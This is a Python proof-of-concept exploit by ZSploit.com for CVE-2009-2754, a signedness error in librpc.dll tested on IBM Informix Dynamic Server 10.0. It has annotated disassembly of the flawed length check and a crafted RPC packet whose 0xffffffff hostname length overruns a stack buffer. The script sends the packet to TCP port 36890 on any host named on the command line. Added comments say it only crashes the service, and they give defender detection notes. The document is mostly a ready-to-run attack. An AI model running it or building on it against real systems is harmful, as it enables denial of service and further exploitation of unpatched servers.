# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability |
# Date: 2010-04-08 |
# Author: ZSploit.com |
# Software Link: N/A |
# Version: N/A |
# Tested on: IBM Informix Dynamic Server 10.0 |
# CVE : CVE-2009-2754 |
|
#! /usr/bin/env python |
############################################################################### |
## File : zs_ids_rpc.py |
## Description: |
## : |
## Created_On : Mar 21 2010 |
## |
## (c) Copyright 2010, ZSploit.com. all rights reserved. |
############################################################################### |
""" |
The issue in __lgto_svcauth_unix(): |
|
.text:1000B8E1 mov [ebp+0], eax |
.text:1000B8E4 mov eax, [ebx] |
.text:1000B8E6 push eax ; netlong |
.text:1000B8E7 add ebx, 4 |
.text:1000B8EA call esi ; ntohl ; Get length of hostname |
.text:1000B8EC cmp eax, 0FFh ; Signedness error: the compare is signed, so a length of 0xffffffff (-1) passes this check
.text:1000B8F1 jle short loc_1000B8FD |
.text:1000B8F3 mov esi, 1 |
.text:1000B8F8 jmp loc_1000B9D5 |
.text:1000B8FD ; --------------------------------------------------------------------------- |
.text:1000B8FD |
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j |
.text:1000B8FD mov edi, [ebp+4] |
.text:1000B900 mov ecx, eax |
.text:1000B902 mov edx, ecx |
.text:1000B904 mov esi, ebx |
.text:1000B906 shr ecx, 2 |
.text:1000B909 rep movsd ; inline memcpy using the user-supplied length; the copy overruns the stack buffer
.text:1000B90B mov ecx, edx |
.text:1000B90D add eax, 3 |
.text:1000B910 and ecx, 3 |
.text:1000B913 rep movsb |
""" |
|
import sys |
import socket |
|
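# Exactly one positional argument, the target host, is required.
if len(sys.argv) != 2:
    print "Usage:\t%s [target]" % sys.argv[0]
    # Exit non-zero: the original returned 0 on a usage error, which made a
    # mis-invocation indistinguishable from a completed run for any wrapper.
    sys.exit(1)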
|
|
# The single request (8 lines x 16 bytes, last line 8 bytes = 120 bytes) that is
# written to the listener. Per the disassembly in the module docstring, the
# server reads a big-endian length with ntohl and compares it against 0xFF with
# a signed jle, so 0xffffffff (-1) slips past the bound and is then used as the
# size of an inline memcpy onto the stack. The wire layout is not documented on
# this page; the notes below are what can be read off the bytes and should be
# confirmed against the binary:
#   - leading 0x80000074: looks like an ONC RPC record mark (last-fragment bit
#     | 0x74 = 116 = number of bytes that follow) -- TODO confirm
#   - the four 0xff bytes on the third line are presumably the hostname length
#     field that the signed check mis-handles (svcauth_unix -> AUTH_UNIX creds)
#   - the 0x41 (16 bytes) and 0x42 (32 bytes) runs are plain filler; there is
#     no shellcode in this PoC, so it crashes the service rather than delivering
#     code (denial of service)
# Defender notes: the fix tracked as ZDI-10-023 / CVE-2009-2754 is an unsigned
# bound on the length before the copy; on the wire, an AUTH_UNIX block whose
# hostname length field is 0xffffffff (or otherwise > 0xFF) is the thing to
# alert on, and the listener should not be reachable from untrusted networks.
data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \
"\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \
"\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
"\x00\x00\x00\x00\x00\x00\x00\x00"
|
# Target host comes from the command line; 36890 is the hard-coded TCP port of
# the vulnerable listener (tested build: IBM Informix Dynamic Server 10.0, per
# the header). Nothing is read back: the script is one-shot, connect-and-send.
host = sys.argv[1]
port = 36890

print "PoC for ZDI-10-023 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        # NOTE(review): socket.send() may write fewer bytes than requested; the
        # return value is not checked and sendall() is not used, so a short
        # write would go unnoticed and "Sending payload .." would still print.
        s.send(data)
        print "Sending payload .."
    except:
        # NOTE(review): a bare except hides the real cause (connection refused,
        # timeout, even KeyboardInterrupt); catching socket.error and printing
        # the exception would make failures diagnosable.
        print "Error in send"
    # Printed on both the success and the failed-send path.
    print "Done"
except:
    # Only socket creation can fail here, since the inner try covers the rest.
    print "Error in socket"
# NOTE(review): the socket is never closed; the OS reclaims it at exit, which is
# harmless for a one-shot script but would leak descriptors if this ran in a loop.
|
The ZSploit Team |
http://zsploit.com |